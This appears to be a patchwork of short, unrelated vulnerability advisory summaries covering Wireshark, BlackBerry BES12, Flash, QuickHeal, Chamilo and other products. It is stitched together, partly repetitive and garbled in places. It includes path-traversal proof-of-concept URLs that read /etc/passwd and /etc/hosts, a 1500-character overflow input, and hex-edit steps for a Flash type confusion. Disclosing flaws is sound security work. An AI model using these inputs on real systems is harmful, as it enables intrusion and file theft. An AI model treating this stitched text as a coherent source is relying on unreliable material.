The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark. The crash is caused by a WRITE of size 1425 at 0x61b00001e95c thread T0, which is located 0 bytes to the right of 1500-byte region [0x61b00001e380,0x61b00001e95c) allocated by thread T0.
An out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark. This can lead to a crash due to the global-buffer-overflow on address 0x7fd688698b10 at pc 0x7fd685351320 bp 0x7ffd862371a0 sp 0x7ffd86237198.
Blackberry BES12 is an enterprise mobile management solution and contains a self-service web application available to mobile users. This web application contains multiple vulnerabilities including unauthenticated SQL injection and reflected cross site scripting. Limited access to an on-premise BES12 environment was provided during the discovery of these vulnerabilities. The full impact of the vulnerabilities in relation to compromising other portions of the BES12 solution, such as mobile devices, is unclear. The Java servlet com.rim.mdm.ui.server.ImageServlet is vulnerable to SQL injection via the imageName parameter. This servlet is exposed at multiple paths and is used to fetch an image from the database. The Java servlet com.rim.mdm.ui.server.LoginServlet is vulnerable to reflected cross site scripting via the error parameter.
The vulnerability is a static out-of-bounds read in Wireshark, which can be triggered by feeding a malformed file to tshark. The crash can be observed in an ASAN build of Wireshark (current git master).
The vulnerability has the most typical Buffer overflow vulnerabilities. Insert string into 'Log filename(include path)' field that [setup] - [new] - [Logging options] - [More] 'Log filename(include path)' field is no limit to the length and does not check the length. Insert string 'A'*1500 and press Ok, OK, causing a crash.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `filename` value of the `./toolkit/upload` module. The persistent input validation web vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable module. The persistent input validation web vulnerability is located in the `name` value of the `./toolkit/upload` module.
Based on a code review done on the product, this product doesn't have any observation on some parameters, that make the attacker able to read file contents. PoC 1: https://www.site.com/mod/system/report_download.php?report_filename=/etc/passwd or view-source:https://www.site.com/mod/system/report_download.php?report_filename=../../../../../../../../../../../../etc/passwd PoC 2: [login authentication required] https://www.site.com/mod/generic/download_config_file.php?config_file=../../../../../../../../../../../../../../etc/hosts
There is a type confusion vulnerability in the SimpleButton constructor. Flash stores an empty button to use to create buttons for optimization reasons. If this object is created using a SWF tag before it is created in the Button class, and it not of type Button, type confusion can occur. A SWF needs to be altered in a hex editor to reproduce this issue. To start, build button.fla. This is a swf with the code: var sb = new SimpleButton(); and a font attached. Decompress the swf using flasm -x button.swf, and then replace all occurrences of the font ID (0x0001) in the three tags that use it with the ID of the empty button object (0xfff6). When the button is created, the font will be type confused with a button.
A denial of service vulnerability exists in QuickHeal webssx.sys driver due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted IOCTL request to the driver, resulting in a denial of service condition.
A persistent cross site scripting vulnerability has been discoverd in the official web-application Product Chamilo LMS. A GET cross site scripting web vulnerability has been discovered in the official Netlife Photosuite Pro Content Management System. A vulnerability allows remote attackers to inject malicious script codes on the client-siide of the vulnerable module. The vulnerability is located in the `name` value of the `user` module. Remote attackers are able to inject own malicious script codes to the vulnerable `name` value.
Services By CQR